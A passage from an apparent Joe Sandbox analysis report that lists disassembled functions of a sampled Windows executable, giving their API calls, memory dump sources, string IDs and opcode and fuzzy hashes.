                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Interlocked$DecrementIncrementlstrlen
                                                                                                                • String ID: .ts1$ftp://
                                                                                                                • API String ID: 1122469558-3531992581
                                                                                                                • Opcode ID: 17ed6d53d82fa884372492280869ad4441fda80bd7862ea76ed06d387506c6f4
                                                                                                                • Instruction ID: b23469b802c3d87ff035e30288ec3f7e072d4780da6447de21843100e3b89ac1
                                                                                                                • Opcode Fuzzy Hash: 17ed6d53d82fa884372492280869ad4441fda80bd7862ea76ed06d387506c6f4
                                                                                                                • Instruction Fuzzy Hash: 14718075801248EADF10EFA1C845FEFBBB8AF14304F10455EF905A3282DB786B48CB65
                                                                                                                Function 00434125 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0043412A
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$lstrlen
                                                                                                                • String ID: 0:R$I
                                                                                                                • API String ID: 3243491680-1600366541
                                                                                                                • Opcode ID: 111e8c79b85105b137a4c019ed7d09d61113b06c70afe54a9a15e350266782eb
                                                                                                                • Instruction ID: df62d6789979d9f3daf6c84f98353f7b6eaf649a8d07728426456e3b4f0ee987
                                                                                                                • Opcode Fuzzy Hash: 111e8c79b85105b137a4c019ed7d09d61113b06c70afe54a9a15e350266782eb
                                                                                                                • Instruction Fuzzy Hash: 8851F339800619AADB05F7A6CC06FEF77689F16368F10424FF511761C2DB7C678582AE
                                                                                                                Function 0040C17F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 128stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0040C184
                                                                                                                  • Part of subcall function 00408EFE: __EH_prolog.LIBCMT ref: 00408F03
                                                                                                                  • Part of subcall function 00408EFE: GetFileAttributesA.KERNEL32(?), ref: 00408F28
                                                                                                                  • Part of subcall function 004C5707: CreateFileA.KERNEL32(00000000,80000000,00000000,0000000C,00000003,00000080,00000000,?,?,00000000), ref: 004C57E2
                                                                                                                  • Part of subcall function 004C5707: GetLastError.KERNEL32 ref: 004C57F4
                                                                                                                • lstrcpy.KERNEL32(?,?), ref: 0040C2A5
                                                                                                                  • Part of subcall function 0040C343: IsWindow.USER32(?), ref: 0040C355
                                                                                                                  • Part of subcall function 0040C343: __ftol.LIBCMT ref: 0040C383
                                                                                                                  • Part of subcall function 0040C343: SendMessageA.USER32(?,00000402,00000000,00000000), ref: 0040C394
                                                                                                                  • Part of subcall function 0040C39D: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0040C412
                                                                                                                  • Part of subcall function 0040C39D: TranslateMessage.USER32(?), ref: 0040C442
                                                                                                                  • Part of subcall function 0040C39D: DispatchMessageA.USER32(?), ref: 0040C44C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$FileH_prolog$AttributesCreateDispatchErrorLastPeekSendTranslateWindow__ftollstrcpy
                                                                                                                • String ID: ThN
                                                                                                                • API String ID: 510894268-2830422598
                                                                                                                • Opcode ID: 78c58609502f0026bb3b5c5a8f7fa41b7730c3b93c7170fda8bcbe378e90c44d
                                                                                                                • Instruction ID: 25bdd14736904e7a68876107adc4856bed8a9e72e083bc47d31e4424eccc7f6d
                                                                                                                • Opcode Fuzzy Hash: 78c58609502f0026bb3b5c5a8f7fa41b7730c3b93c7170fda8bcbe378e90c44d
                                                                                                                • Instruction Fuzzy Hash: 88518F35C00249EADF04EFE5D885BEEBB74AF14318F10816EE41172292DB786B49CB29
                                                                                                                Function 00410C62 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00410C67
                                                                                                                  • Part of subcall function 004C60D9: __EH_prolog.LIBCMT ref: 004C60DE
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 004B0B55: GetFileAttributesA.KERNEL32(-R,004BD3B6,?,00000000,00000000,00522DE4,?,?,?,004EF72C,00000000), ref: 004B0B59
                                                                                                                  • Part of subcall function 004B0B55: GetLastError.KERNEL32(?,?,?,004EF72C,00000000), ref: 004B0B64
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prologInterlocked$AttributesDecrementErrorFileIncrementLast
                                                                                                                • String ID: .bak$.bak%d
                                                                                                                • API String ID: 677611752-745829535
                                                                                                                • Opcode ID: 7385c34c16d00868352fd2e998f3352109f7392347fb315ea9527b5d4411d65f
                                                                                                                • Instruction ID: 8dc6751980f71ab65e1ded59b00581142b9bb52d9439ec5f0642a256a849fc29
                                                                                                                • Opcode Fuzzy Hash: 7385c34c16d00868352fd2e998f3352109f7392347fb315ea9527b5d4411d65f
                                                                                                                • Instruction Fuzzy Hash: 83417F7A800659EACB01EBE5C845FEFBB78AF14318F10415EF511A3181DB786748CB75
                                                                                                                Function 00430B4E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00430B53
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 0042E792: LoadLibraryA.KERNEL32(00000000), ref: 0046EB47
                                                                                                                • GetProcAddress.KERNEL32(00000000,MsiGetPatchInfoA), ref: 00430BC5
                                                                                                                  • Part of subcall function 004AF0B8: RtlFreeHeap.NTDLL(00000000,?,00000000,00000010,?,?,004AF278,00000009,?), ref: 004AF18C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$AddressFreeHeapLibraryLoadProclstrlen
                                                                                                                • String ID: MsiGetPatchInfoA
                                                                                                                • API String ID: 2260080404-1707134638
                                                                                                                • Opcode ID: 8a7626d70408cf29df8550467f0c79caeecfdd22aae776b9c0116046193ab3b6
                                                                                                                • Instruction ID: f622c02d9beb288d9a41b1fd29b04a252ada4eada294bb5e6b80a74a96ebaf97
                                                                                                                • Opcode Fuzzy Hash: 8a7626d70408cf29df8550467f0c79caeecfdd22aae776b9c0116046193ab3b6
                                                                                                                • Instruction Fuzzy Hash: 1741C136C00159AACF19FBA2DC56EEF7B35AF15304F24412FF502B2192DB3C5A85C6A9
                                                                                                                Function 004801EB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004801F0
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DecrementH_prologInterlocked
                                                                                                                • String ID: format$hex
                                                                                                                • API String ID: 3164693477-1485289233
                                                                                                                • Opcode ID: e78bfa4c3b28e76ec602a13045f26fb30a7ad3081961aaa0353f1c72c5e02176
                                                                                                                • Instruction ID: 63ac802d9f089038e9c95cc77e0c68553d63bc3e3eef8d01ecc9caa67044fc9e
                                                                                                                • Opcode Fuzzy Hash: e78bfa4c3b28e76ec602a13045f26fb30a7ad3081961aaa0353f1c72c5e02176
                                                                                                                • Instruction Fuzzy Hash: 08312731500249AFCF04EF66C852EEE7BB5EF84308F10846FF815A7292CB789A49D765
                                                                                                                Function 0046C87F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0046C884
                                                                                                                  • Part of subcall function 00468117: __EH_prolog.LIBCMT ref: 0046811C
                                                                                                                Strings
                                                                                                                • IDS_CTRL_HEADINGTEXT_BODY, xrefs: 0046C967
                                                                                                                • IDS_CTRL_STATICTEXT_BODY, xrefs: 0046C8D4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: IDS_CTRL_HEADINGTEXT_BODY$IDS_CTRL_STATICTEXT_BODY
                                                                                                                • API String ID: 3519838083-3606236380
                                                                                                                • Opcode ID: d983231e5e4ded4787ff96606f8914af4e0dba78532c44342271eea23bca7ad4
                                                                                                                • Instruction ID: 8154a464002968108653f5dcc75fb85f388f8944d62b225d8e1d3f33522248a0
                                                                                                                • Opcode Fuzzy Hash: d983231e5e4ded4787ff96606f8914af4e0dba78532c44342271eea23bca7ad4
                                                                                                                • Instruction Fuzzy Hash: 0441A170900B159FCB14EFA6C946AAFFBF4EF44324F10461FE052A3281DBB86A44CB95
                                                                                                                Function 00480321 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: Screen$Type
                                                                                                                • API String ID: 3519838083-617370513
                                                                                                                • Opcode ID: 8b01ae5d27545ad62e6c26f6c2cbcd58978377146c512a43085041379b89473b
                                                                                                                • Instruction ID: 4d38a4c78756a561892016d3518d24bbf6b374d1b1301723247150b4428ad458
                                                                                                                • Opcode Fuzzy Hash: 8b01ae5d27545ad62e6c26f6c2cbcd58978377146c512a43085041379b89473b
                                                                                                                • Instruction Fuzzy Hash: 1831A6307102149BCB25BF658451AFEB762AF80B04F04855FF816AB2C2CB7C9E469789
                                                                                                                Function 00424104 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 00424126
                                                                                                                  • Part of subcall function 0041EDCC: __EH_prolog.LIBCMT ref: 0041EDD1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$__ftol
                                                                                                                • String ID: Enabled$Visible
                                                                                                                • API String ID: 386204849-1194824832
                                                                                                                • Opcode ID: f8130d1a5acbb87e7987217ceba4de550b8fe73c33f1e1a00c56b4673b90db14
                                                                                                                • Instruction ID: 727e803c07ceded52639f44ab80efcc3192eb2c7be4f64242e16063d67e17eca
                                                                                                                • Opcode Fuzzy Hash: f8130d1a5acbb87e7987217ceba4de550b8fe73c33f1e1a00c56b4673b90db14
                                                                                                                • Instruction Fuzzy Hash: 0321043220952536DA0676269C87EEF325D8F86378F30070FF921651D2EF6D669343AE
                                                                                                                Function 00480B51 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: ZipFileCRCData$ZipFileCRCInfo
                                                                                                                • API String ID: 3519838083-379976688
                                                                                                                • Opcode ID: 027991c6773f67ed7ff06815a17ef31d95307381e26db3317ca2e5c28c7bf88a
                                                                                                                • Instruction ID: bf1fec61cde53dc7334019232a03e174b5150932d6ab1f9396e4793b92ea1ffe
                                                                                                                • Opcode Fuzzy Hash: 027991c6773f67ed7ff06815a17ef31d95307381e26db3317ca2e5c28c7bf88a
                                                                                                                • Instruction Fuzzy Hash: 0921E431A102009BDB58FB628851BBEB3A5AF81358F044A1FE416AB2C1DB7CAD45C758
                                                                                                                Function 0045802F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(00000008), ref: 0045807D
                                                                                                                • OffsetRect.USER32(?,?,?), ref: 004580C0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ColorOffsetRect
                                                                                                                • String ID: R
                                                                                                                • API String ID: 1473908254-1466425173
                                                                                                                • Opcode ID: 87402b30b09adf95f20f316e5906a4d698248f703c8e0abd12351f7576789b39
                                                                                                                • Instruction ID: b24df7492ff9630f9153139915470f7fb99dadaa0dd5e0d8afb21a39ace5a7f1
                                                                                                                • Opcode Fuzzy Hash: 87402b30b09adf95f20f316e5906a4d698248f703c8e0abd12351f7576789b39
                                                                                                                • Instruction Fuzzy Hash: E5318D7160061AEFCF14EFA5C8849AEBBB9FF48315B00402EFA4597242CB35A955CF94
                                                                                                                Function 0048044B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: Event$Events
                                                                                                                • API String ID: 3519838083-2431416839
                                                                                                                • Opcode ID: 72f999b65ca79ff045f81e014d9002d8c138294f9f518baaf714218419d64d07
                                                                                                                • Instruction ID: 0449487f76448c15c9ca2abf4542bc0cedd1a6ef3351e798faa6b9fdc01194ba
                                                                                                                • Opcode Fuzzy Hash: 72f999b65ca79ff045f81e014d9002d8c138294f9f518baaf714218419d64d07
                                                                                                                • Instruction Fuzzy Hash: 2621B531750204ABDF54BF6688917BE73A5AB80B08F00893FA9169B281CB7C9D49CB58
                                                                                                                Function 00428515 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0042851A
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0041F1C0: __EH_prolog.LIBCMT ref: 0041F1C5
                                                                                                                • ShellExecuteA.SHELL32(00000000,print,00000000,?,00000000,00523A30), ref: 004285A0
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Interlocked$DecrementExecuteIncrementShell
                                                                                                                • String ID: print
                                                                                                                • API String ID: 254888685-366378086
                                                                                                                • Opcode ID: d6f795a2272b4998821c805ec25e9288379cf5329f8cf8f2ed4a70f64ceb31e5
                                                                                                                • Instruction ID: ee7be14681b1b8fb26f5df937825c69c377f3cbfc24692162d5aaee1b3869af0
                                                                                                                • Opcode Fuzzy Hash: d6f795a2272b4998821c805ec25e9288379cf5329f8cf8f2ed4a70f64ceb31e5
                                                                                                                • Instruction Fuzzy Hash: 3821C475D04218BBCF15EBAAD806BDEBF74EF04314F10406FF405B2182DB795B858AA9
                                                                                                                Function 00480978 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0048097D
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
